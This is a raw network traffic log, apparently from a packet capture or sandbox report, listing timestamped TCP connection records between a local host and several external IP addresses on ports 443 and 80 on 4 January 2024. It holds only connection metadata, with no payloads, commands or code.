                                                                                    Jan 4, 2024 08:30:24.563234091 CET44349749162.159.129.233192.168.2.6
                                                                                    Jan 4, 2024 08:30:24.711540937 CET4975080192.168.2.6149.154.167.99
                                                                                    Jan 4, 2024 08:30:24.759097099 CET44349749162.159.129.233192.168.2.6
                                                                                    Jan 4, 2024 08:30:24.761497021 CET49749443192.168.2.6162.159.129.233
                                                                                    Jan 4, 2024 08:30:24.761508942 CET44349749162.159.129.233192.168.2.6
                                                                                    Jan 4, 2024 08:30:24.891393900 CET8049750149.154.167.99192.168.2.6
                                                                                    Jan 4, 2024 08:30:24.891495943 CET4975080192.168.2.6149.154.167.99
                                                                                    Jan 4, 2024 08:30:24.892070055 CET4975080192.168.2.6149.154.167.99
                                                                                    Jan 4, 2024 08:30:25.050237894 CET44349749162.159.129.233192.168.2.6
                                                                                    Jan 4, 2024 08:30:25.050331116 CET44349749162.159.129.233192.168.2.6
                                                                                    Jan 4, 2024 08:30:25.050461054 CET49749443192.168.2.6162.159.129.233
                                                                                    Jan 4, 2024 08:30:25.051009893 CET49749443192.168.2.6162.159.129.233
                                                                                    Jan 4, 2024 08:30:25.071466923 CET8049750149.154.167.99192.168.2.6
                                                                                    Jan 4, 2024 08:30:25.073126078 CET8049750149.154.167.99192.168.2.6
                                                                                    Jan 4, 2024 08:30:25.077071905 CET49751443192.168.2.6149.154.167.99
                                                                                    Jan 4, 2024 08:30:25.077091932 CET44349751149.154.167.99192.168.2.6
                                                                                    Jan 4, 2024 08:30:25.077192068 CET49751443192.168.2.6149.154.167.99
                                                                                    Jan 4, 2024 08:30:25.086390972 CET49751443192.168.2.6149.154.167.99
                                                                                    Jan 4, 2024 08:30:25.086405993 CET44349751149.154.167.99192.168.2.6
                                                                                    Jan 4, 2024 08:30:25.123212099 CET4975080192.168.2.6149.154.167.99
                                                                                    Jan 4, 2024 08:30:25.156578064 CET49752443192.168.2.6104.21.89.193
                                                                                    Jan 4, 2024 08:30:25.156591892 CET44349752104.21.89.193192.168.2.6
                                                                                    Jan 4, 2024 08:30:25.156740904 CET49752443192.168.2.6104.21.89.193
                                                                                    Jan 4, 2024 08:30:25.157203913 CET49752443192.168.2.6104.21.89.193
                                                                                    Jan 4, 2024 08:30:25.157216072 CET44349752104.21.89.193192.168.2.6
                                                                                    Jan 4, 2024 08:30:25.361076117 CET44349752104.21.89.193192.168.2.6
                                                                                    Jan 4, 2024 08:30:25.362901926 CET49752443192.168.2.6104.21.89.193
                                                                                    Jan 4, 2024 08:30:25.362921953 CET44349752104.21.89.193192.168.2.6
                                                                                    Jan 4, 2024 08:30:25.451071978 CET44349751149.154.167.99192.168.2.6
                                                                                    Jan 4, 2024 08:30:25.451138973 CET49751443192.168.2.6149.154.167.99
                                                                                    Jan 4, 2024 08:30:25.453841925 CET49751443192.168.2.6149.154.167.99
                                                                                    Jan 4, 2024 08:30:25.453847885 CET44349751149.154.167.99192.168.2.6
                                                                                    Jan 4, 2024 08:30:25.454103947 CET44349751149.154.167.99192.168.2.6
                                                                                    Jan 4, 2024 08:30:25.498193979 CET49751443192.168.2.6149.154.167.99
                                                                                    Jan 4, 2024 08:30:25.561085939 CET49751443192.168.2.6149.154.167.99
                                                                                    Jan 4, 2024 08:30:25.604742050 CET44349751149.154.167.99192.168.2.6
                                                                                    Jan 4, 2024 08:30:25.836996078 CET44349751149.154.167.99192.168.2.6
                                                                                    Jan 4, 2024 08:30:25.837023020 CET44349751149.154.167.99192.168.2.6
                                                                                    Jan 4, 2024 08:30:25.837033987 CET44349751149.154.167.99192.168.2.6
                                                                                    Jan 4, 2024 08:30:25.837049961 CET44349751149.154.167.99192.168.2.6
                                                                                    Jan 4, 2024 08:30:25.837105989 CET49751443192.168.2.6149.154.167.99
                                                                                    Jan 4, 2024 08:30:25.837117910 CET44349751149.154.167.99192.168.2.6
                                                                                    Jan 4, 2024 08:30:25.837150097 CET49751443192.168.2.6149.154.167.99
                                                                                    Jan 4, 2024 08:30:25.837172985 CET49751443192.168.2.6149.154.167.99
                                                                                    Jan 4, 2024 08:30:25.853625059 CET49751443192.168.2.6149.154.167.99
                                                                                    Jan 4, 2024 08:30:25.855029106 CET4975080192.168.2.6149.154.167.99
                                                                                    Jan 4, 2024 08:30:25.856342077 CET49753443192.168.2.615.204.213.5
                                                                                    Jan 4, 2024 08:30:25.856391907 CET4434975315.204.213.5192.168.2.6
                                                                                    Jan 4, 2024 08:30:25.856447935 CET49753443192.168.2.615.204.213.5
                                                                                    Jan 4, 2024 08:30:25.856873035 CET49753443192.168.2.615.204.213.5
                                                                                    Jan 4, 2024 08:30:25.856889963 CET4434975315.204.213.5192.168.2.6
                                                                                    Jan 4, 2024 08:30:25.872550011 CET44349752104.21.89.193192.168.2.6
                                                                                    Jan 4, 2024 08:30:25.872673035 CET44349752104.21.89.193192.168.2.6
                                                                                    Jan 4, 2024 08:30:25.872735023 CET49752443192.168.2.6104.21.89.193
                                                                                    Jan 4, 2024 08:30:25.873235941 CET49752443192.168.2.6104.21.89.193
                                                                                    Jan 4, 2024 08:30:25.874490023 CET49754443192.168.2.6104.21.89.193
                                                                                    Jan 4, 2024 08:30:25.874519110 CET44349754104.21.89.193192.168.2.6
                                                                                    Jan 4, 2024 08:30:25.874599934 CET49754443192.168.2.6104.21.89.193
                                                                                    Jan 4, 2024 08:30:25.875109911 CET49754443192.168.2.6104.21.89.193
                                                                                    Jan 4, 2024 08:30:25.875128984 CET44349754104.21.89.193192.168.2.6
                                                                                    Jan 4, 2024 08:30:26.035686970 CET8049750149.154.167.99192.168.2.6
                                                                                    Jan 4, 2024 08:30:26.035756111 CET4975080192.168.2.6149.154.167.99
                                                                                    Jan 4, 2024 08:30:26.051848888 CET4434975315.204.213.5192.168.2.6
                                                                                    Jan 4, 2024 08:30:26.051940918 CET49753443192.168.2.615.204.213.5
                                                                                    Jan 4, 2024 08:30:26.054167032 CET49753443192.168.2.615.204.213.5
                                                                                    Jan 4, 2024 08:30:26.054178953 CET4434975315.204.213.5192.168.2.6
                                                                                    Jan 4, 2024 08:30:26.054528952 CET4434975315.204.213.5192.168.2.6
                                                                                    Jan 4, 2024 08:30:26.056150913 CET49753443192.168.2.615.204.213.5
                                                                                    Jan 4, 2024 08:30:26.073731899 CET44349754104.21.89.193192.168.2.6
                                                                                    Jan 4, 2024 08:30:26.077236891 CET49754443192.168.2.6104.21.89.193
                                                                                    Jan 4, 2024 08:30:26.077260017 CET44349754104.21.89.193192.168.2.6
                                                                                    Jan 4, 2024 08:30:26.100734949 CET4434975315.204.213.5192.168.2.6
                                                                                    Jan 4, 2024 08:30:26.281933069 CET4434975315.204.213.5192.168.2.6
                                                                                    Jan 4, 2024 08:30:26.282017946 CET4434975315.204.213.5192.168.2.6
                                                                                    Jan 4, 2024 08:30:26.282069921 CET49753443192.168.2.615.204.213.5
                                                                                    Jan 4, 2024 08:30:26.282793045 CET49753443192.168.2.615.204.213.5
                                                                                    Jan 4, 2024 08:30:26.432857037 CET49755443192.168.2.6104.21.89.193
                                                                                    Jan 4, 2024 08:30:26.432904005 CET44349755104.21.89.193192.168.2.6
                                                                                    Jan 4, 2024 08:30:26.432981968 CET49755443192.168.2.6104.21.89.193
                                                                                    Jan 4, 2024 08:30:26.434133053 CET49755443192.168.2.6104.21.89.193
                                                                                    Jan 4, 2024 08:30:26.434145927 CET44349755104.21.89.193192.168.2.6
                                                                                    Jan 4, 2024 08:30:26.440395117 CET49756443192.168.2.6104.21.89.193
                                                                                    Jan 4, 2024 08:30:26.440423965 CET44349756104.21.89.193192.168.2.6
                                                                                    Jan 4, 2024 08:30:26.440479040 CET49756443192.168.2.6104.21.89.193
                                                                                    Jan 4, 2024 08:30:26.441039085 CET49756443192.168.2.6104.21.89.193
                                                                                    Jan 4, 2024 08:30:26.441051960 CET44349756104.21.89.193192.168.2.6
                                                                                    Jan 4, 2024 08:30:26.557929039 CET44349754104.21.89.193192.168.2.6
                                                                                    Jan 4, 2024 08:30:26.558062077 CET44349754104.21.89.193192.168.2.6
                                                                                    Jan 4, 2024 08:30:26.558168888 CET49754443192.168.2.6104.21.89.193
                                                                                    Jan 4, 2024 08:30:26.591600895 CET49754443192.168.2.6104.21.89.193
                                                                                    Jan 4, 2024 08:30:26.599288940 CET49757443192.168.2.6162.159.129.233
                                                                                    Jan 4, 2024 08:30:26.599323034 CET44349757162.159.129.233192.168.2.6
                                                                                    Jan 4, 2024 08:30:26.599507093 CET49757443192.168.2.6162.159.129.233
                                                                                    Jan 4, 2024 08:30:26.600030899 CET49757443192.168.2.6162.159.129.233
                                                                                    Jan 4, 2024 08:30:26.600043058 CET44349757162.159.129.233192.168.2.6
                                                                                    Jan 4, 2024 08:30:26.636190891 CET44349755104.21.89.193192.168.2.6
                                                                                    Jan 4, 2024 08:30:26.636297941 CET49755443192.168.2.6104.21.89.193
                                                                                    Jan 4, 2024 08:30:26.639234066 CET49755443192.168.2.6104.21.89.193
                                                                                    Jan 4, 2024 08:30:26.639242887 CET44349755104.21.89.193192.168.2.6
                                                                                    Jan 4, 2024 08:30:26.639658928 CET44349755104.21.89.193192.168.2.6
                                                                                    Jan 4, 2024 08:30:26.641594887 CET44349756104.21.89.193192.168.2.6
                                                                                    Jan 4, 2024 08:30:26.641705990 CET49756443192.168.2.6104.21.89.193
                                                                                    Jan 4, 2024 08:30:26.642162085 CET49755443192.168.2.6104.21.89.193
                                                                                    Jan 4, 2024 08:30:26.643656015 CET49756443192.168.2.6104.21.89.193
                                                                                    Jan 4, 2024 08:30:26.643661976 CET44349756104.21.89.193192.168.2.6
                                                                                    Jan 4, 2024 08:30:26.643903017 CET44349756104.21.89.193192.168.2.6
                                                                                    Jan 4, 2024 08:30:26.665080070 CET49756443192.168.2.6104.21.89.193
                                                                                    Jan 4, 2024 08:30:26.688738108 CET44349755104.21.89.193192.168.2.6
                                                                                    Jan 4, 2024 08:30:26.712734938 CET44349756104.21.89.193192.168.2.6
                                                                                    Jan 4, 2024 08:30:26.794759989 CET44349757162.159.129.233192.168.2.6
                                                                                    Jan 4, 2024 08:30:26.796900988 CET49757443192.168.2.6162.159.129.233
                                                                                    Jan 4, 2024 08:30:26.796907902 CET44349757162.159.129.233192.168.2.6
                                                                                    Jan 4, 2024 08:30:27.103319883 CET44349755104.21.89.193192.168.2.6
                                                                                    Jan 4, 2024 08:30:27.103436947 CET44349755104.21.89.193192.168.2.6
                                                                                    Jan 4, 2024 08:30:27.104847908 CET49755443192.168.2.6104.21.89.193
                                                                                    Jan 4, 2024 08:30:27.162400961 CET44349757162.159.129.233192.168.2.6
                                                                                    Jan 4, 2024 08:30:27.162518024 CET44349757162.159.129.233192.168.2.6
                                                                                    Jan 4, 2024 08:30:27.162858009 CET49757443192.168.2.6162.159.129.233
                                                                                    Jan 4, 2024 08:30:27.176949978 CET49755443192.168.2.6104.21.89.193
                                                                                    Jan 4, 2024 08:30:27.178184032 CET49757443192.168.2.6162.159.129.233
                                                                                    Jan 4, 2024 08:30:27.180108070 CET49758443192.168.2.6104.21.89.193
                                                                                    Jan 4, 2024 08:30:27.180134058 CET44349758104.21.89.193192.168.2.6
                                                                                    Jan 4, 2024 08:30:27.180191040 CET49758443192.168.2.6104.21.89.193
                                                                                    Jan 4, 2024 08:30:27.180989981 CET49758443192.168.2.6104.21.89.193
                                                                                    Jan 4, 2024 08:30:27.181003094 CET44349758104.21.89.193192.168.2.6
                                                                                    Jan 4, 2024 08:30:27.280824900 CET49759443192.168.2.6104.21.89.193
                                                                                    Jan 4, 2024 08:30:27.280863047 CET44349759104.21.89.193192.168.2.6
                                                                                    Jan 4, 2024 08:30:27.281023026 CET49759443192.168.2.6104.21.89.193
                                                                                    Jan 4, 2024 08:30:27.281774998 CET49759443192.168.2.6104.21.89.193
                                                                                    Jan 4, 2024 08:30:27.281790018 CET44349759104.21.89.193192.168.2.6
                                                                                    Jan 4, 2024 08:30:27.334893942 CET44349756104.21.89.193192.168.2.6
                                                                                    Jan 4, 2024 08:30:27.335007906 CET44349756104.21.89.193192.168.2.6
                                                                                    Jan 4, 2024 08:30:27.335102081 CET49756443192.168.2.6104.21.89.193
                                                                                    Jan 4, 2024 08:30:27.335928917 CET49756443192.168.2.6104.21.89.193
                                                                                    Jan 4, 2024 08:30:27.338946104 CET49760443192.168.2.6104.21.89.193
                                                                                    Jan 4, 2024 08:30:27.338989973 CET44349760104.21.89.193192.168.2.6
                                                                                    Jan 4, 2024 08:30:27.339063883 CET49760443192.168.2.6104.21.89.193
                                                                                    Jan 4, 2024 08:30:27.339308023 CET49760443192.168.2.6104.21.89.193
                                                                                    Jan 4, 2024 08:30:27.339324951 CET44349760104.21.89.193192.168.2.6
                                                                                    Jan 4, 2024 08:30:27.381370068 CET44349758104.21.89.193192.168.2.6
                                                                                    Jan 4, 2024 08:30:27.383019924 CET49758443192.168.2.6104.21.89.193
                                                                                    Jan 4, 2024 08:30:27.383048058 CET44349758104.21.89.193192.168.2.6
                                                                                    Jan 4, 2024 08:30:27.481439114 CET44349759104.21.89.193192.168.2.6
                                                                                    Jan 4, 2024 08:30:27.483769894 CET49759443192.168.2.6104.21.89.193
                                                                                    Jan 4, 2024 08:30:27.483803034 CET44349759104.21.89.193192.168.2.6
                                                                                    Jan 4, 2024 08:30:27.538945913 CET44349760104.21.89.193192.168.2.6
                                                                                    Jan 4, 2024 08:30:27.685748100 CET49760443192.168.2.6104.21.89.193
                                                                                    Jan 4, 2024 08:30:27.851231098 CET44349758104.21.89.193192.168.2.6
                                                                                    Jan 4, 2024 08:30:27.851337910 CET44349758104.21.89.193192.168.2.6
                                                                                    Jan 4, 2024 08:30:27.851404905 CET49758443192.168.2.6104.21.89.193
                                                                                    Jan 4, 2024 08:30:27.972296953 CET44349759104.21.89.193192.168.2.6
                                                                                    Jan 4, 2024 08:30:27.972419024 CET44349759104.21.89.193192.168.2.6
                                                                                    Jan 4, 2024 08:30:27.972491980 CET49759443192.168.2.6104.21.89.193
                                                                                    Jan 4, 2024 08:30:29.167248964 CET49758443192.168.2.6104.21.89.193
                                                                                    Jan 4, 2024 08:30:29.168752909 CET49759443192.168.2.6104.21.89.193
                                                                                    Jan 4, 2024 08:30:29.170842886 CET49761443192.168.2.6104.21.89.193
                                                                                    Jan 4, 2024 08:30:29.170878887 CET44349761104.21.89.193192.168.2.6
                                                                                    Jan 4, 2024 08:30:29.170937061 CET49761443192.168.2.6104.21.89.193
                                                                                    Jan 4, 2024 08:30:29.171859026 CET49762443192.168.2.6104.21.89.193
                                                                                    Jan 4, 2024 08:30:29.171896935 CET44349762104.21.89.193192.168.2.6
                                                                                    Jan 4, 2024 08:30:29.171958923 CET49762443192.168.2.6104.21.89.193
                                                                                    Jan 4, 2024 08:30:29.173221111 CET49761443192.168.2.6104.21.89.193
                                                                                    Jan 4, 2024 08:30:29.173237085 CET44349761104.21.89.193192.168.2.6
                                                                                    Jan 4, 2024 08:30:29.173430920 CET49762443192.168.2.6104.21.89.193
                                                                                    Jan 4, 2024 08:30:29.173448086 CET44349762104.21.89.193192.168.2.6
                                                                                    Jan 4, 2024 08:30:29.176670074 CET49760443192.168.2.6104.21.89.193
                                                                                    Jan 4, 2024 08:30:29.176703930 CET44349760104.21.89.193192.168.2.6
                                                                                    Jan 4, 2024 08:30:29.391413927 CET44349762104.21.89.193192.168.2.6
                                                                                    Jan 4, 2024 08:30:29.392960072 CET44349761104.21.89.193192.168.2.6
                                                                                    Jan 4, 2024 08:30:29.393579006 CET49762443192.168.2.6104.21.89.193
                                                                                    Jan 4, 2024 08:30:29.393599033 CET44349762104.21.89.193192.168.2.6
                                                                                    Jan 4, 2024 08:30:29.394675016 CET49761443192.168.2.6104.21.89.193
                                                                                    Jan 4, 2024 08:30:29.394702911 CET44349761104.21.89.193192.168.2.6
                                                                                    Jan 4, 2024 08:30:29.709604025 CET44349760104.21.89.193192.168.2.6
                                                                                    Jan 4, 2024 08:30:29.709733009 CET44349760104.21.89.193192.168.2.6
                                                                                    Jan 4, 2024 08:30:29.709950924 CET49760443192.168.2.6104.21.89.193
                                                                                    Jan 4, 2024 08:30:29.710320950 CET49760443192.168.2.6104.21.89.193
                                                                                    Jan 4, 2024 08:30:29.720890045 CET49763443192.168.2.6162.159.129.233
                                                                                    Jan 4, 2024 08:30:29.720918894 CET44349763162.159.129.233192.168.2.6
                                                                                    Jan 4, 2024 08:30:29.720982075 CET49763443192.168.2.6162.159.129.233
                                                                                    Jan 4, 2024 08:30:29.721329927 CET49763443192.168.2.6162.159.129.233
                                                                                    Jan 4, 2024 08:30:29.721342087 CET44349763162.159.129.233192.168.2.6
                                                                                    Jan 4, 2024 08:30:29.723078966 CET49761443192.168.2.6104.21.89.193
                                                                                    Jan 4, 2024 08:30:29.723176956 CET44349761104.21.89.193192.168.2.6
                                                                                    Jan 4, 2024 08:30:29.723227978 CET49761443192.168.2.6104.21.89.193
                                                                                    Jan 4, 2024 08:30:29.867804050 CET44349762104.21.89.193192.168.2.6
                                                                                    Jan 4, 2024 08:30:29.867922068 CET44349762104.21.89.193192.168.2.6
                                                                                    Jan 4, 2024 08:30:29.868025064 CET49762443192.168.2.6104.21.89.193
                                                                                    Jan 4, 2024 08:30:29.868496895 CET49762443192.168.2.6104.21.89.193
                                                                                    Jan 4, 2024 08:30:29.873493910 CET49764443192.168.2.6162.159.129.233
                                                                                    Jan 4, 2024 08:30:29.873523951 CET44349764162.159.129.233192.168.2.6
                                                                                    Jan 4, 2024 08:30:29.873594046 CET49764443192.168.2.6162.159.129.233
                                                                                    Jan 4, 2024 08:30:29.874084949 CET49764443192.168.2.6162.159.129.233
                                                                                    Jan 4, 2024 08:30:29.874099016 CET44349764162.159.129.233192.168.2.6
                                                                                    Jan 4, 2024 08:30:29.915225983 CET44349763162.159.129.233192.168.2.6
                                                                                    Jan 4, 2024 08:30:29.915321112 CET49763443192.168.2.6162.159.129.233
                                                                                    Jan 4, 2024 08:30:29.917032957 CET49763443192.168.2.6162.159.129.233
                                                                                    Jan 4, 2024 08:30:29.917038918 CET44349763162.159.129.233192.168.2.6
                                                                                    Jan 4, 2024 08:30:29.917242050 CET44349763162.159.129.233192.168.2.6
                                                                                    Jan 4, 2024 08:30:29.918659925 CET49763443192.168.2.6162.159.129.233
                                                                                    Jan 4, 2024 08:30:29.964736938 CET44349763162.159.129.233192.168.2.6
                                                                                    Jan 4, 2024 08:30:30.069803953 CET44349764162.159.129.233192.168.2.6
                                                                                    Jan 4, 2024 08:30:30.071595907 CET49764443192.168.2.6162.159.129.233
                                                                                    Jan 4, 2024 08:30:30.071614027 CET44349764162.159.129.233192.168.2.6
                                                                                    Jan 4, 2024 08:30:30.210793018 CET44349763162.159.129.233192.168.2.6
                                                                                    Jan 4, 2024 08:30:30.210899115 CET44349763162.159.129.233192.168.2.6
                                                                                    Jan 4, 2024 08:30:30.210984945 CET49763443192.168.2.6162.159.129.233
                                                                                    Jan 4, 2024 08:30:30.213953972 CET49763443192.168.2.6162.159.129.233
                                                                                    Jan 4, 2024 08:30:30.328798056 CET49765443192.168.2.6104.21.89.193
                                                                                    Jan 4, 2024 08:30:30.328820944 CET44349765104.21.89.193192.168.2.6
                                                                                    Jan 4, 2024 08:30:30.328881979 CET49765443192.168.2.6104.21.89.193
                                                                                    Jan 4, 2024 08:30:30.329271078 CET49765443192.168.2.6104.21.89.193
                                                                                    Jan 4, 2024 08:30:30.329283953 CET44349765104.21.89.193192.168.2.6
                                                                                    Jan 4, 2024 08:30:30.343384981 CET44349764162.159.129.233192.168.2.6
                                                                                    Jan 4, 2024 08:30:30.343512058 CET44349764162.159.129.233192.168.2.6
                                                                                    Jan 4, 2024 08:30:30.343586922 CET49764443192.168.2.6162.159.129.233
                                                                                    Jan 4, 2024 08:30:30.344192982 CET49764443192.168.2.6162.159.129.233
                                                                                    Jan 4, 2024 08:30:30.453139067 CET49766443192.168.2.6104.21.89.193
                                                                                    Jan 4, 2024 08:30:30.453180075 CET44349766104.21.89.193192.168.2.6
                                                                                    Jan 4, 2024 08:30:30.453253031 CET49766443192.168.2.6104.21.89.193
                                                                                    Jan 4, 2024 08:30:30.453732014 CET49766443192.168.2.6104.21.89.193
                                                                                    Jan 4, 2024 08:30:30.453746080 CET44349766104.21.89.193192.168.2.6
                                                                                    Jan 4, 2024 08:30:30.534765959 CET44349765104.21.89.193192.168.2.6
                                                                                    Jan 4, 2024 08:30:30.534836054 CET49765443192.168.2.6104.21.89.193
                                                                                    Jan 4, 2024 08:30:30.536947012 CET49765443192.168.2.6104.21.89.193
                                                                                    Jan 4, 2024 08:30:30.536957026 CET44349765104.21.89.193192.168.2.6
                                                                                    Jan 4, 2024 08:30:30.537214041 CET44349765104.21.89.193192.168.2.6
                                                                                    Jan 4, 2024 08:30:30.542490959 CET49765443192.168.2.6104.21.89.193
                                                                                    Jan 4, 2024 08:30:30.584741116 CET44349765104.21.89.193192.168.2.6
                                                                                    Jan 4, 2024 08:30:30.653726101 CET44349766104.21.89.193192.168.2.6
                                                                                    Jan 4, 2024 08:30:30.655853987 CET49766443192.168.2.6104.21.89.193
                                                                                    Jan 4, 2024 08:30:30.655875921 CET44349766104.21.89.193192.168.2.6
                                                                                    Jan 4, 2024 08:30:31.019876957 CET44349765104.21.89.193192.168.2.6
                                                                                    Jan 4, 2024 08:30:31.019994020 CET44349765104.21.89.193192.168.2.6
                                                                                    Jan 4, 2024 08:30:31.020046949 CET49765443192.168.2.6104.21.89.193
                                                                                    Jan 4, 2024 08:30:31.020663023 CET49765443192.168.2.6104.21.89.193
                                                                                    Jan 4, 2024 08:30:31.022166967 CET49767443192.168.2.6104.21.89.193
                                                                                    Jan 4, 2024 08:30:31.022201061 CET44349767104.21.89.193192.168.2.6
                                                                                    Jan 4, 2024 08:30:31.022279024 CET49767443192.168.2.6104.21.89.193
                                                                                    Jan 4, 2024 08:30:31.022711039 CET49767443192.168.2.6104.21.89.193
                                                                                    Jan 4, 2024 08:30:31.022722006 CET44349767104.21.89.193192.168.2.6
                                                                                    Jan 4, 2024 08:30:31.170588017 CET44349766104.21.89.193192.168.2.6
                                                                                    Jan 4, 2024 08:30:31.170701027 CET44349766104.21.89.193192.168.2.6
                                                                                    Jan 4, 2024 08:30:31.170846939 CET49766443192.168.2.6104.21.89.193
                                                                                    Jan 4, 2024 08:30:31.174185038 CET49766443192.168.2.6104.21.89.193
                                                                                    Jan 4, 2024 08:30:31.176213026 CET49768443192.168.2.6104.21.89.193
                                                                                    Jan 4, 2024 08:30:31.176249981 CET44349768104.21.89.193192.168.2.6
                                                                                    Jan 4, 2024 08:30:31.176314116 CET49768443192.168.2.6104.21.89.193
                                                                                    Jan 4, 2024 08:30:31.176597118 CET49768443192.168.2.6104.21.89.193
                                                                                    Jan 4, 2024 08:30:31.176614046 CET44349768104.21.89.193192.168.2.6
                                                                                    Jan 4, 2024 08:30:31.223512888 CET44349767104.21.89.193192.168.2.6
                                                                                    Jan 4, 2024 08:30:31.225256920 CET49767443192.168.2.6104.21.89.193
                                                                                    Jan 4, 2024 08:30:31.225265026 CET44349767104.21.89.193192.168.2.6
                                                                                    Jan 4, 2024 08:30:31.375097036 CET44349768104.21.89.193192.168.2.6
                                                                                    Jan 4, 2024 08:30:31.376730919 CET49768443192.168.2.6104.21.89.193
                                                                                    Jan 4, 2024 08:30:31.376750946 CET44349768104.21.89.193192.168.2.6
                                                                                    Jan 4, 2024 08:30:31.701473951 CET44349767104.21.89.193192.168.2.6
                                                                                    Jan 4, 2024 08:30:31.701594114 CET44349767104.21.89.193192.168.2.6
                                                                                    Jan 4, 2024 08:30:31.701662064 CET49767443192.168.2.6104.21.89.193
                                                                                    Jan 4, 2024 08:30:31.702250957 CET49767443192.168.2.6104.21.89.193
                                                                                    Jan 4, 2024 08:30:31.707739115 CET49769443192.168.2.6162.159.129.233
                                                                                    Jan 4, 2024 08:30:31.707779884 CET44349769162.159.129.233192.168.2.6
                                                                                    Jan 4, 2024 08:30:31.707850933 CET49769443192.168.2.6162.159.129.233
                                                                                    Jan 4, 2024 08:30:31.708281040 CET49769443192.168.2.6162.159.129.233
                                                                                    Jan 4, 2024 08:30:31.708296061 CET44349769162.159.129.233192.168.2.6
                                                                                    Jan 4, 2024 08:30:31.902569056 CET44349769162.159.129.233192.168.2.6
                                                                                    Jan 4, 2024 08:30:31.904551029 CET49769443192.168.2.6162.159.129.233
                                                                                    Jan 4, 2024 08:30:31.904567003 CET44349769162.159.129.233192.168.2.6
                                                                                    Jan 4, 2024 08:30:32.055279970 CET44349768104.21.89.193192.168.2.6
                                                                                    Jan 4, 2024 08:30:32.055397034 CET44349768104.21.89.193192.168.2.6
                                                                                    Jan 4, 2024 08:30:32.055464029 CET49768443192.168.2.6104.21.89.193
                                                                                    Jan 4, 2024 08:30:32.055908918 CET49768443192.168.2.6104.21.89.193
                                                                                    Jan 4, 2024 08:30:32.060332060 CET49770443192.168.2.6162.159.129.233
                                                                                    Jan 4, 2024 08:30:32.060362101 CET44349770162.159.129.233192.168.2.6
                                                                                    Jan 4, 2024 08:30:32.060442924 CET49770443192.168.2.6162.159.129.233
                                                                                    Jan 4, 2024 08:30:32.060873032 CET49770443192.168.2.6162.159.129.233
                                                                                    Jan 4, 2024 08:30:32.060884953 CET44349770162.159.129.233192.168.2.6
                                                                                    Jan 4, 2024 08:30:32.156229973 CET44349769162.159.129.233192.168.2.6
                                                                                    Jan 4, 2024 08:30:32.156337976 CET44349769162.159.129.233192.168.2.6
                                                                                    Jan 4, 2024 08:30:32.156397104 CET49769443192.168.2.6162.159.129.233
                                                                                    Jan 4, 2024 08:30:32.157085896 CET49769443192.168.2.6162.159.129.233
                                                                                    Jan 4, 2024 08:30:32.259018898 CET44349770162.159.129.233192.168.2.6
                                                                                    Jan 4, 2024 08:30:32.260993004 CET49770443192.168.2.6162.159.129.233
                                                                                    Jan 4, 2024 08:30:32.261004925 CET44349770162.159.129.233192.168.2.6
                                                                                    Jan 4, 2024 08:30:32.267456055 CET49771443192.168.2.6104.21.89.193
                                                                                    Jan 4, 2024 08:30:32.267484903 CET44349771104.21.89.193192.168.2.6
                                                                                    Jan 4, 2024 08:30:32.267577887 CET49771443192.168.2.6104.21.89.193
                                                                                    Jan 4, 2024 08:30:32.268743992 CET49771443192.168.2.6104.21.89.193
                                                                                    Jan 4, 2024 08:30:32.268757105 CET44349771104.21.89.193192.168.2.6
                                                                                    Jan 4, 2024 08:30:32.480432987 CET44349771104.21.89.193192.168.2.6
                                                                                    Jan 4, 2024 08:30:32.482074022 CET49771443192.168.2.6104.21.89.193
                                                                                    Jan 4, 2024 08:30:32.482091904 CET44349771104.21.89.193192.168.2.6
                                                                                    Jan 4, 2024 08:30:32.511703968 CET44349770162.159.129.233192.168.2.6
                                                                                    Jan 4, 2024 08:30:32.511807919 CET44349770162.159.129.233192.168.2.6
                                                                                    Jan 4, 2024 08:30:32.511888027 CET49770443192.168.2.6162.159.129.233
                                                                                    Jan 4, 2024 08:30:32.515518904 CET49770443192.168.2.6162.159.129.233
                                                                                    Jan 4, 2024 08:30:32.625083923 CET49772443192.168.2.6104.21.89.193
                                                                                    Jan 4, 2024 08:30:32.625112057 CET44349772104.21.89.193192.168.2.6
                                                                                    Jan 4, 2024 08:30:32.625195026 CET49772443192.168.2.6104.21.89.193
                                                                                    Jan 4, 2024 08:30:32.625564098 CET49772443192.168.2.6104.21.89.193
                                                                                    Jan 4, 2024 08:30:32.625576973 CET44349772104.21.89.193192.168.2.6
                                                                                    Jan 4, 2024 08:30:32.824636936 CET44349772104.21.89.193192.168.2.6
                                                                                    Jan 4, 2024 08:30:32.827033997 CET49772443192.168.2.6104.21.89.193
                                                                                    Jan 4, 2024 08:30:32.827050924 CET44349772104.21.89.193192.168.2.6
                                                                                    Jan 4, 2024 08:30:32.996373892 CET44349771104.21.89.193192.168.2.6
                                                                                    Jan 4, 2024 08:30:32.996475935 CET44349771104.21.89.193192.168.2.6
                                                                                    Jan 4, 2024 08:30:32.996539116 CET49771443192.168.2.6104.21.89.193
                                                                                    Jan 4, 2024 08:30:32.997153997 CET49771443192.168.2.6104.21.89.193
                                                                                    Jan 4, 2024 08:30:32.998495102 CET49773443192.168.2.6104.21.89.193
                                                                                    Jan 4, 2024 08:30:32.998522997 CET44349773104.21.89.193192.168.2.6
                                                                                    Jan 4, 2024 08:30:32.998585939 CET49773443192.168.2.6104.21.89.193
                                                                                    Jan 4, 2024 08:30:32.999092102 CET49773443192.168.2.6104.21.89.193
                                                                                    Jan 4, 2024 08:30:32.999104023 CET44349773104.21.89.193192.168.2.6
                                                                                    Jan 4, 2024 08:30:33.198339939 CET44349773104.21.89.193192.168.2.6
                                                                                    Jan 4, 2024 08:30:33.200927973 CET49773443192.168.2.6104.21.89.193
                                                                                    Jan 4, 2024 08:30:33.200954914 CET44349773104.21.89.193192.168.2.6
                                                                                    Jan 4, 2024 08:30:33.317755938 CET44349772104.21.89.193192.168.2.6
                                                                                    Jan 4, 2024 08:30:33.317878962 CET44349772104.21.89.193192.168.2.6
                                                                                    Jan 4, 2024 08:30:33.317981005 CET49772443192.168.2.6104.21.89.193
                                                                                    Jan 4, 2024 08:30:33.318438053 CET49772443192.168.2.6104.21.89.193
                                                                                    Jan 4, 2024 08:30:33.319607019 CET49774443192.168.2.6104.21.89.193
                                                                                    Jan 4, 2024 08:30:33.319638014 CET44349774104.21.89.193192.168.2.6
                                                                                    Jan 4, 2024 08:30:33.319725037 CET49774443192.168.2.6104.21.89.193
                                                                                    Jan 4, 2024 08:30:33.320065975 CET49774443192.168.2.6104.21.89.193
                                                                                    Jan 4, 2024 08:30:33.320080042 CET44349774104.21.89.193192.168.2.6
                                                                                    Jan 4, 2024 08:30:33.521931887 CET44349774104.21.89.193192.168.2.6
